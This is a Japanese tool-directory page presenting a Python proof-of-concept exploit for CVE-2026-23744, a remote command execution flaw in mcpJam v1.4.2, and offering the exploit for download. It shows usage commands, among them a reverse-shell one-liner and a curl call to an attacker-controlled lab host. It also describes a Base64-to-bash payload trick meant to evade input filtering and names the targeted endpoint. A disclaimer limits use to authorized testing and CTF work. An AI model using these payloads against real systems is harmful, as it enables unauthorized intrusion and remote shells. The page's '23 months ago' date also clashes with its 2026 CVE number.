Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23744-poc — cve-2026-23744 Python エクスプロイト | Kitploit
ツール/GitHubGitHub/keeieb79/cve-2026-23744-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubkeeieb79/cve-2026-23744-poc

CVE-2026-23744-poc

cve-2026-23744 Python エクスプロイト

リポジトリを見る
23ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23744 — mcpJam リモートコード実行 (RCE) エクスプロイト

本ツールは、mcpJam v1.4.2 に影響する任意のコマンド実行の脆弱性 CVE-2026-23744 に対する概念実証エクスプロイト(Python 3 製)です。このユーティリティは、送信前にコマンドを透過的に Base64 エンコードすることでペイロードの配信を自動化し、制限的な入力検証や文字フィルタリング機構を回避するのに役立ちます。ペイロードはターゲットシステム上で /bin/bash ラッパーを通じてデコードされ実行されます。


特徴

自動 Base64 ペイロードエンコーディング

コマンドは送信前に自動的にエンコードされるため、厳格な入力検証や文字制限を課すアプリケーションを対象とする際の信頼性が向上します。

柔軟なコマンド実行

以下を含む任意のコマンド実行をサポートします:

  • リバースシェル(sh、bash、nc など)
  • システム列挙
  • ネットワーク接続テスト
  • カスタムペイロード配信

詳細なデバッグ出力

以下を表示します:

  • 生成された JSON リクエストペイロード
  • サーバーの生の応答

これにより、トラブルシューティングとエクスプロイトの検証が簡素化されます。

SSL 検証のバイパス

証明書検証の警告を抑制し、自己署名や信頼されていない SSL 証明書を使用するターゲットとのやり取りを可能にします。


使い方

前提条件

必要な依存関係をインストールします:

root@kitploit:~
pip install requests

構文

root@kitploit:~
python3 exploit.py <target_url> "<command>"

例

接続テスト

root@kitploit:~
python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"

リバースシェル

root@kitploit:~
python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"

技術詳細

このエクスプロイトは、悪意のある serverConfig オブジェクトを作成して /api/mcp/connect エンドポイントをターゲットにします。コマンドを直接送信する代わりに、ペイロードは Base64 エンコードされた文字列に変換され、Bash を介して実行されます:

root@kitploit:~
"args": [
    "-c",
    f"echo {base64_payload} | base64 -d | bash"
]

このアプローチは、アプリケーションレベルのフィルタリングを回避しつつ、ペイロードがターゲットホスト上で完全にデコードおよび実行されることを保証します。

実行フロー

  1. ユーザーが指定したコマンドが Base64 エンコードされます。
  2. エンコードされたペイロードが serverConfig リクエストに埋め込まれます。
  3. ターゲットサーバーが base64 -d を使用してペイロードをデコードします。
  4. デコードされたコマンドが /bin/bash に直接パイプされます。
  5. コマンドは脆弱性のある mcpJam プロセスの権限で実行されます。

免責事項

[!WARNING] このプロジェクトは、教育目的、許可されたセキュリティ評価、および Capture The Flag (CTF) 環境のためにのみ提供されています。

明示的な許可なくシステムに対して不正に使用することは、違法かつ非倫理的です。著者は、本ソフトウェアの使用に起因する誤用、損害、または法的結果について一切の責任を負いません。

ツールをダウンロード